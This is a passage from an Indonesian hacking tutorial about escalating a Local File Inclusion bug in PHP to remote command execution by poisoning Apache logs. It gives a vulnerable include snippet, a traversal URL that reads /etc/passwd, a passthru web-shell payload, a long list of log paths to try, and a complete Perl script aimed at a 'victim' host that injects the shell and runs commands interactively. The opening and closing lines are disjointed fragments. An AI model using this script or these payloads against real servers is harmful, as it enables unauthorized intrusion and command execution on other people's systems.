dewi persik bugil, dll ( padahal tetep ada tuh ;p )
// chapter 1 --- LOgs ANd LFI
ok , file log sendiri merupakan file yang berisi mengenai aktifitas2 komputer dan aktifitas yang
dilakukan di server , blah apa iki maksudnye begini - begini singkat kata file logs adalah file
yang berisi tentang aktifitas/Kegiatan di komputer(server).
Jd semua akses yang dilakukan kita akan di catat di file ini
Local File inclusion(LFI) sendiri dapat di artikan sebagai penyisipan file yang ada di local
//chapter 2 --- The Bug (LFI Concept)
contoh code yang terkena LFI
< ?php
$page = $_GET[page];
include($page);
? >
pada kode ini terlihat jelas variable Page tidak terfilter , dengan modifikasi url seperti
dibawah seorang penyerang dapat meload dan mengesekusi file tsb
http://Injek.injekkan.com/index.php?page=../../../../../../../etc/passwd
dan hasilnya akan terlihat isi dari file /etc/passwd
//chapter 3 --- fuck'n file logs
seperti yang sudah aq kasih tau diatas bahwa file logs mencatat semua aktifitas yang ada diserver , termasuk url yang sudah di modifikasi :) .
yah dengan memasukan <? passthru($_GET[cmd]) ?> pada url aq bisa menjalankan perintah pada server.
kenapa ?????? ingat file log akan mencatat semua aktifitas di dalam server,
- manipulasi url menjadi --> http://Injek.injekkan.com/<? passthru($_GET[cmd]) ?>
- file <? passthru($_GET[cmd]) ?> tidak terdapat di server , dan webserver akan mencatat di file log ( biasanya error_log )
- get your shellllllllllllllllll ............... in http://Injek.injekkan.com/../../../../../../../etc/httpd/logs/error_log?cmd=your_command_shell .....
secara default file log tersimpan disini
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
//chapter 4 --- THe script
use LWP::UserAgent;
$korban="victim.com";
$path="/folder/";
$code="<? passthru($_GET[cmd]) ?>";
$log = "../../../../../../../etc/httpd/logs/error_log";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$korban", PeerPort=>"80") or die "
Connection Failed. ";
print $socket "GET ".$path.$code." HTTP/1.1 ";
print $socket "User-Agent: ".$code." ";
print $socket "Host: ".$korban." ";
print $socket "Connection: close ";
close($socket);
print " Code $code sucssefully injected in $log ";
print " Type command to run or exit to end: ";
$cmd = <STDIN>;
while($cmd !~ "exit") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$korban", PeerPort=>"80") or die "
Connection Failed. ";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1 ";
print $socket "Host: ".$korban." ";
print $socket "Accept: */* ";
print $socket "Connection: close ";
while ($show = <$socket>)
{
print $show;
}
print "Type command to run or exit to end: ";
$cmd = <STDIN>;
}
referensi
e-rdc.org
rstzone.org
), this's a real time penetration
,.. babbi) ...
, saya pun
nyaut aja nih si pak yudi )
